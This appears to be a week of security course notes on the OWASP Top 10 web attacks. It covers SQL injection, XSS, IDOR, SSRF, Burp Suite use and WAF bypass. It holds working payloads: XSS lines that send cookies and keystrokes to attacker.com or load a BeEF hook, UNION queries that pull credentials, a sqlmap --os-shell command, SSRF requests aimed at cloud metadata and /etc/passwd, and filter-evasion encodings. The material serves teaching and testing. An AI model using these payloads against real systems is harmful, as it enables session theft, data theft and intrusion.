Week 6 โ Web Application Attacks (OWASP Top 10)¶
Learning Objectives¶
- [ ] Explain and demonstrate the OWASP Top 10 (2021) vulnerability categories
- [ ] Perform SQL injection attacks (in-band, blind, time-based) using sqlmap
- [ ] Execute Cross-Site Scripting (XSS) attacks (reflected, stored, DOM)
- [ ] Use Burp Suite Proxy, Repeater, and Intruder for web application testing
- [ ] Identify broken access control and IDOR vulnerabilities
1. OWASP Top 10 (2021)¶
The Open Web Application Security Project publishes the definitive ranking of web application security risks:
| Rank | Category | Key CWEs |
|---|---|---|
| A01 | Broken Access Control | CWE-200, CWE-284 |
| A02 | Cryptographic Failures | CWE-259, CWE-327 |
| A03 | Injection (SQLi, XSS, command) | CWE-89, CWE-79 |
| A04 | Insecure Design | CWE-209, CWE-256 |
| A05 | Security Misconfiguration | CWE-16, CWE-611 |
| A06 | Vulnerable & Outdated Components | CWE-1035, CWE-937 |
| A07 | Identification & Auth Failures | CWE-297, CWE-287 |
| A08 | Software & Data Integrity Failures | CWE-829, CWE-494 |
| A09 | Security Logging & Monitoring Failures | CWE-223, CWE-778 |
| A10 | Server-Side Request Forgery (SSRF) | CWE-918 |
2. SQL Injection (A03)¶
SQLi occurs when user-supplied input is incorporated into database queries without proper sanitization.
2.1 How SQLi Works¶
-- Intended query (login check):
SELECT * FROM users WHERE username='admin' AND password='secret';
-- Attacker input: username = admin'--
-- Resulting query:
SELECT * FROM users WHERE username='admin'--' AND password='whatever';
-- The -- comments out the password check โ login bypass
2.2 SQLi Types¶
IN-BAND SQLi (results returned directly in response)
โโโ Error-Based โ DB error messages leak data
โโโ Union-Based โ UNION SELECT extracts additional data
BLIND SQLi (no direct output โ infer from behavior)
โโโ Boolean-Based โ True/False conditions change response
โโโ Time-Based โ SLEEP() delays confirm injection
OUT-OF-BAND SQLi (data via DNS/HTTP callback โ rare but severe)
2.3 Manual SQLi Testing¶
-- Step 1: Detect injection point
' OR '1'='1
' OR 1=1--
' OR 1=1#
admin'--
-- Step 2: Determine number of columns (UNION-based)
' ORDER BY 1-- (no error)
' ORDER BY 2-- (no error)
' ORDER BY 5-- (error! = 4 columns)
-- Step 3: Find displayed columns
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT 'a',NULL,NULL,NULL-- (test which columns display)
-- Step 4: Extract data
' UNION SELECT table_name,NULL,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password,NULL,NULL FROM users--
-- Time-based blind (MySQL):
'; SELECT SLEEP(5)-- (if 5 second delay, injection confirmed)
-- Boolean blind:
' AND SUBSTRING(username,1,1)='a'-- (iterate characters)
2.4 sqlmap โ Automated SQLi¶
# Basic scan of a URL parameter
sqlmap -u "http://target.com/item?id=1"
# POST parameter injection
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# With authentication cookie
sqlmap -u "http://target.com/profile?id=5" --cookie="session=abc123"
# Extract all databases
sqlmap -u "http://target.com/item?id=1" --dbs
# Extract tables from specific DB
sqlmap -u "http://target.com/item?id=1" -D webdb --tables
# Dump specific table
sqlmap -u "http://target.com/item?id=1" -D webdb -T users --dump
# OS shell (if DB has FILE privileges)
sqlmap -u "http://target.com/item?id=1" --os-shell
# Burp Suite request file
sqlmap -r request.txt --level=5 --risk=3
3. Cross-Site Scripting (XSS โ A03)¶
XSS allows attackers to inject client-side scripts into web pages viewed by other users.
3.1 XSS Types¶
REFLECTED XSS
โ Payload in URL parameter โ reflected in response
โ Victim must click malicious link
โ Example: https://target.com/search?q=<script>alert(1)</script>
STORED XSS (Persistent)
โ Payload saved in database (comment, profile, message)
โ All users who view the page execute the script
โ Most dangerous โ requires no victim interaction beyond normal browsing
DOM-BASED XSS
โ Payload manipulates DOM client-side via JavaScript
โ Server never sees the payload
โ Difficult to detect with server-side WAFs
3.2 Useful XSS Payloads¶
// Basic detection
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>
javascript:alert(1)
// Cookie theft (attacker exfiltrates session token)
<script>document.location='http://attacker.com/?c='+document.cookie</script>
<script>new Image().src='http://attacker.com/?'+document.cookie</script>
// Keylogger
<script>document.onkeypress=function(e){new Image().src='http://attacker.com/k?k='+e.key}</script>
// BeEF hook (full browser exploitation framework)
<script src='http://attacker.com:3000/hook.js'></script>
// Filter bypass techniques:
<ScRiPt>alert(1)</ScRiPt> // Case variation
<img src=x onerror="alert`1`"> // Backtick alternative to ()
<svg onload=alert(1)> // SVG element
<body/onload=alert(1)> // Event handler
4. Broken Access Control & IDOR (A01)¶
Insecure Direct Object Reference (IDOR) โ changing a parameter value accesses another user's data:
Legitimate request:
GET /api/invoice?id=1001 โ Returns YOUR invoice
IDOR attack (change ID):
GET /api/invoice?id=1002 โ Returns ANOTHER USER's invoice
GET /api/invoice?id=1 โ Returns ADMIN's invoice
Horizontal vs. Vertical Privilege Escalation:
| Type | Description | Example |
|---|---|---|
| Horizontal | Access resources of same-privilege users | View other customers' orders |
| Vertical | Access higher-privilege functions | Regular user accesses admin panel |
5. Server-Side Request Forgery (A10)¶
SSRF forces the server to make HTTP requests on the attacker's behalf โ often reaching internal services:
Normal flow:
Browser โ Web App โ External API
SSRF attack:
Browser โ Web App (with malicious URL) โ Internal AWS metadata
Payload: url=http://169.254.169.254/latest/meta-data/
โ Retrieves AWS EC2 instance credentials!
Other SSRF targets:
http://localhost:6379/ โ Redis (often no auth)
http://localhost:27017/ โ MongoDB
http://internal-elastic:9200/ โ Elasticsearch
file:///etc/passwd โ Local file read
6. Burp Suite Professional Workflow¶
Burp Suite is the industry-standard web application testing platform:
6.1 Proxy Setup¶
Browser โ Configure HTTP proxy: 127.0.0.1:8080 โ Burp Proxy โ Target
# Import Burp CA certificate to browser (avoids HTTPS cert errors)
# Burp โ Proxy โ Options โ CA Certificate โ Export
6.2 Key Burp Tools¶
PROXY INTERCEPT
โ Capture and modify all requests/responses in real-time
โ Forward, drop, or send to other tools
REPEATER
โ Manually resend modified requests
โ Essential for manual SQLi, XSS, IDOR testing
โ Keyboard shortcut: Ctrl+R (send to Repeater)
INTRUDER (Fuzzing/Brute Force)
โ Mark injection points with ยง markers ยง
โ Attack types:
Sniper โ One payload list, one position at a time
Battering Ram โ Same payload in all positions
Pitchfork โ Multiple lists, parallel positions
Cluster Bomb โ Cartesian product of all payload lists
โ Use for: password brute force, parameter fuzzing, IDOR enumeration
SCANNER (Pro only)
โ Automated vulnerability discovery
โ Active scan sends crafted requests to detect SQLi, XSS, etc.
DECODER
โ Encode/decode: URL, Base64, HTML, Hex, Gzip
โ Essential for analyzing encoded payloads
COMPARER
โ Diff two requests/responses
โ Useful for detecting subtle boolean-based SQLi differences
6.3 Burp Extensions (BApp Store)¶
Recommended extensions:
Autorize โ Automated IDOR/access control testing
JWT Editor โ JWT token manipulation/attack
SQLiPy โ Integrate sqlmap into Burp
Param Miner โ Discover hidden parameters
Active Scan++ โ Extended vulnerability checks
Turbo Intruder โ High-speed fuzzing (Python-based)
7. Web Application Firewall (WAF) Bypass¶
WAFs filter malicious requests โ bypass techniques:
-- Case variation
SeLeCt UsErNaMe FrOm UsErS
-- Comment insertion
SE/**/LECT user/**/name FROM users
-- URL encoding
%53%45%4C%45%43%54 (SELECT)
-- Double encoding (if server double-decodes)
%2553%2545%254C%2545%2543%2554
-- Alternative syntax (MySQL)
SELECT 0x61646d696e (hex for 'admin')
SELECT CHAR(65,68,77,73,78) ('ADMIN')
Key Vocabulary¶
| Term | Definition |
|---|---|
| SQLi | SQL Injection โ unsanitized input in database queries |
| XSS | Cross-Site Scripting โ injecting scripts into web pages |
| CSRF | Cross-Site Request Forgery โ tricking authenticated users into actions |
| IDOR | Insecure Direct Object Reference โ accessing unauthorized objects by ID |
| SSRF | Server-Side Request Forgery โ server makes requests on attacker's behalf |
| WAF | Web Application Firewall โ filters malicious HTTP traffic |
| Burp Suite | Web application security testing proxy framework |
| Blind SQLi | Injection where results aren't shown directly in response |
Review Questions¶
Self-Assessment
- Explain the difference between stored and reflected XSS. Which poses a greater risk, and why?
- Walk through exploiting a login form vulnerable to SQL injection. Show both the manual technique and how sqlmap would automate this.
- A web app fetches URLs provided by users to generate previews. How would you test for SSRF, and what internal resources would you target?
- You find an IDOR in
/api/user?id=105โ describe your methodology to determine the full impact of this vulnerability. - How does a Content Security Policy (CSP) mitigate XSS, and what are its limitations?
Further Reading¶
- ๐ OWASP Top 10 (2021)
- ๐ PortSwigger Web Security Academy โ free interactive labs
- ๐ The Web Application Hacker's Handbook, 2nd Ed. โ Chapters 7โ10
- ๐ PayloadsAllTheThings โ comprehensive payload lists
- ๐ HackTricks Web โ practical techniques reference